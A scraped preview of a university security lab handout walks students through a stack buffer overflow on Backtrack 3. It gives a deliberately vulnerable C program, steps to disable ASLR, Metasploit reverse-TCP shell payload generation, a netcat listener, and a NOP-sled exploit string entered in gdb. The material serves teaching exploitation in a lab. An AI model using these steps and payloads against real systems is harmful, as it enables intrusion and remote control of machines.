itp125 - lab 5 - buffer overflow in backtrack3

itp125 - lab 5 - buffer overflow in backtrack3 - ITP 125...

Info iconThis preview shows page 1. Sign up to view the full content.

View Full Document Right Arrow Icon
This is the end of the preview. Sign up to access the rest of the document.

Unformatted text preview: ITP 125 – Lab 5 – Simple Buffer Overflow with Backtrack 3 Due: When IPv6 runs out of IP addresses Submission: No submission needed This is the program that you will be writing: //vuln- prog.c #include <stdlib.h> #include <stdio.h> #include <string.h> int bof(char *string) { char buffer[1024]; strcpy(buffer, string); return 1; } int main(int argc, char *argv) { bof(argv[1]); printf("Done..\n"); return 1; } Understanding Buffer Overflows 1. Startup the Backtrack3 virtual machine 2. Login into the Linux system with the following credentials: user: root password: toor 3. Startup X- windows by typing the following in the command line: # startx Note: Do not type the #, it is used to represent the terminal 4. Open a new terminal and do the following 1. The terminal is on the bottom left that has the monitor icon 2. Disable the kernel protection: # echo 0 > /proc/sys/kernel/randomize_va_space 3. Type in the program above by doing the following: # nano –w vuln- prog.c Note: To save the application press CTRL- O, then press ENTER. To exit the text editor, press CTRL- X 4. Compile the program you just wrote with the following command: # gcc vuln- prog.c –o vuln- prog Note: Make sure there isn’t any errors with the program before you continue. 5. Run the program the make sure it works # ./vuln- prog HelloWorld The Debugger and Testing the Application 1. To star the debugger, in the terminal type the following: # gdb ./vuln- prog 2. Run the application using the following command (gdb) run `perl –e ‘print “A”x1032’` Note: Be careful of the ` and ‘ and “. Make sure you have all the right ticks. Also do not type (gdb) it is used to represent the debugger console 3. Look at the registers that were affected (gdb) i r Creating the Payload Note: Read through creating the payload once. After you understand it, you can goto the reference section and create the payload without using the web browser. If you followed the reference command, you will still need to do step 4 of this section! 1. Start up a new terminal and run the following # /msf3/msfweb Note: Do not close the terminal just leave it running 2. Start up Firefox o Type in the following location in the URL: http://localhost:55555 o Disable NoScript for the page by press the “Options” button within the yellow bar on the bottom of the browser Select “Allow http://localhost:55555” 3. On the webpage o Select “Payloads” o Search for the following “Linux command shell, reverse” o Select the following payload: “Linux Command Shell, Reverse TCP Inline” Note: Make sure the architecture is x86 o Before generating the payload enter the following LPORT: 9999 LHOST: 127.0.0.1 Restricted Characters: 0x00 0x0a 0x0d 0x20 0x25 Format: C 4. Copy the payload that is located as the variable buf = Note: When the shell code is generated, remember the size of the bytes o Open KEdit by doing the following: Start à༎ Editors à༎ KEdit o Paste the payload and remove “ and all the newlines. In other words, make sure everything is on a single line §༊ Starting a Listener 1. Start a new terminal and type the following # nc –l –p 9999 –vv Putting it all together 1. Go back to the gdb terminal and type the following (gdb) run `perl –e ‘print “A”x600,”\x90”x<# of nops calculated>,”<shellcode you made in msfweb>”,”BBBB”’` Note: Do not type in the <> and everything in between. You need to fill that with the calculations you did and the shellcode you generated. To calculate the number of nops do the following: 1032 – 600 – 4 – size of the shellcode = # of nops At the end of the command, make sure there is a “ and a ‘ and a ` If you did everything right you should see B’s as the EIP 2. Now you need to find the NOPS location to jump to: o In gdb examine the program’s memory (gdb) x/2000xb $esp Note: Press ENTER until you find a bed of NOPS Pick a memory address that has all NOPS 3. Now enter the address you picked into the command: (gdb) run `perl –e ‘print “A”x600,”\x90”x<# of nops calculated>,”<shellcode you made in msfweb>”,”<address you picked>”’` Note: For the address you picked you need to enter it backwords. For example: 0xbf ff f4 40 will become \x40\xf4\xff\xbf when you enter it into gdb 4. Go back to the terminal that you started netcat o If everything worked you should see “connected to…” o Type in a linux command to see if it worked Reference: There is another way you can create the payload. You can do the following: # cd /pentest/exploits/framework3 # msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.1.255 LPORT=9999 R | msfencode - a x86 - b '\x00\x0a\x0d\x20\x25' t c Note: Replace the LHOST IP address with the IP address of your own virtual machine. ...
View Full Document

Ask a homework question - tutors are online